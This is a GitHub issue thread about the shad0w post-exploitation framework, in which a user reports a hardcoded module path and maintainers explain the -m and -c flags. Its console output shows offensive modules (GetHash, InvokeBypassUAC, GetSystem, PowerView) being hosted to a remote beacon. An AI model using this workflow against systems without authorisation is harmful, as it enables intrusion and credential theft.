search

bats3c / shad0w

A post exploitation framework designed to operate covertly on heavily monitored environments
https://blog.dylan.codes/shad0w/
MIT License
2.03k stars 323 forks source link

PowerShell modules broken #71

Closed leebaird closed 3 years ago

leebaird commented 3 years ago

When trying to call any of the PowerShell modules, shad0w looks in /root/shad0w/scripts/.

Suggest changing the hardcoded path to a relative path. That way if shad0w is installed a different directory like /opt/, all of the modules should work.

shad0w(lee@��$�D) ≫ psh -l
[i] 8 available modules

-        GetHash
-        HostRecon
-        InvokeBypassUAC
-        PowerView
-        BloodHound
-        GetSystem
-        GetComputerInfo
-        PowerUp
shad0w(lee@��$�D) ≫ psh -m GetSystem
[i] Hosting module 'GetSystem' (26498 bytes) => /UrWAPRbCnx
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m GetComputerInfo
[i] Hosting module 'GetComputerInfo' (19028 bytes) => /AaLiQbMQnh
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m PowerUp
[i] Hosting module 'PowerUp' (563259 bytes) => /GQxXuACZpk
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m BloodHound
[i] Hosting module 'BloodHound' (227778 bytes) => /xjpFIVtmpB
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m PowerView
[i] Hosting module 'PowerView' (770038 bytes) => /lAJIJLKHTw
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m InvokeBypassUAC
[i] Hosting module 'InvokeBypassUAC' (407271 bytes) => /sEHXkaJciR
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m HostRecon
[i] Hosting module 'HostRecon' (23436 bytes) => /BFvVxfkcIV
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m GetHash
[i] Hosting module 'GetHash' (22216 bytes) => /NRMMlumHBV
[i] Beacon (a658ffa6a900a25bb4e22de347018b7d) received task

shad0w(lee@��$�D) ≫ psh -m zzzzz
ERROR: [Errno 2] No such file or directory: '/root/shad0w/scripts/zzzzz.ps1'
WayneJLee commented 3 years ago

You need to be passing cmdlets from those modules using the -c flag.

Also, this part isn't well documented but the path /root/shad0w/scripts/ refers to the path where shad0w is located within the Docker container.

bats3c commented 3 years ago

That screenshot shows correct functionality. By using the -m flag you are just loading the module not calling any of the code inside it. You must use the -c flag to run a cmdlet from inside the module.

Also as stated in issue #68 using the hardcoded path of /root/shad0w/scripts/ is fine as shad0w is running inside a docker container so that path will always be right when the container is built correctly.

leebaird commented 3 years ago

Would be nice if no arguments were given, that the help info for the module would be displayed.